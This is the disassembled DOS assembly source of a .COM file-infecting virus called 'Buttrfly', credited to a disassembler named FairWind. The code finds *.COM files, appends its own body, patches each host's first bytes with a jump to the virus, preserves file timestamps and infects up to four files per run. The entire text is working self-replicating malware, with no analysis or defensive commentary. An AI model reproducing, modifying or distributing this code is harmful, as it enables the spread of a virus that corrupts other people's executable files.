BUTTRFLY
;
--------------------------------------------------------------------------
; Disassembled by FairWind
;
--------------------------------------------------------------------------
.model tiny
.code
org 100h
start:
jmp virus
nop
nop
oldjmp db 0cdh
newjmp db 20h
db 90h
id db 1
virus:
call delta
delta:
pop bp
sub bp,10Bh
mov di,100h
lea si,[bp+oldjmp]
mov cx,4
cld
rep movsb
mov ah,1Ah
lea dx,[bp+dta]
int 21h
mov byte ptr [bp+offset counter],0
mov ah,4Eh
lea si,[bp+dta+1eh]
lea dx,[bp+fspec]
push dx
jmp short findfiles
returntohost:
mov ah,1Ah
mov dx,80h
int 21h
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh
mov bp,100h
push bp
xor bp,bp
retn
closeup:
or bx,bx
jz findnext
mov ch,0
mov cl,[bp+dta+15h]
mov ax,5701h
mov cx,word ptr [bp+dta+16h]
mov dx,word ptr [bp+dta+18h]
int 21h
mov ah,3Eh
int 21h
xor bx,bx
findnext:
mov ah,4Fh
findfiles:
pop dx
push dx
mov cx,7
xor bx,bx
int 21h
jnc infect
jmp returntohost2
vname db 0FFh
db 'Goddamn Butterflies'
db 0FFh
infect:
mov dx,si
mov ax,3D02h
int 21h
jc closeup
mov bx,ax
mov ah,3Fh
mov cx,4
lea dx,[bp+oldjmp]
int 21h
mov ax,word ptr [bp+dta+23h]
cmp ax,444Eh
je closeup
cmp [bp+id],1
je closeup
mov ax,word ptr [bp+dta+1ah]
cmp ax,121
jb closeup
mov ax,4202h
cwd
xor cx,cx
int 21h
cmp ax,64768
ja closeup
mov [bp+data],ax
lea dx,[bp+oldjmp]
mov cx,4
mov ah,40h
int 21h
lea dx,[bp+virus]
mov cx,12Ah
mov ah,40h
int 21h
mov ax,4200h
cwd
xor cx,cx
int 21h
mov ax,[bp+data]
inc ax
mov word ptr [bp+newjmp],ax
mov [bp+oldjmp],0E9h
mov [bp+id],1
lea dx,[bp+oldjmp]
mov ah,40h
mov cx,4
int 21h
inc [bp+counter]
cmp [bp+counter],4
jae returntohost3
jmp closeup
returntohost2:
mov di,100h
cmp word ptr [di],20CDh
je returntohost3
returntohost3:
jmp returntohost
fspec db '*.COM',0
dta db 43 dup (0)
counter db 0
data dw 0
end start
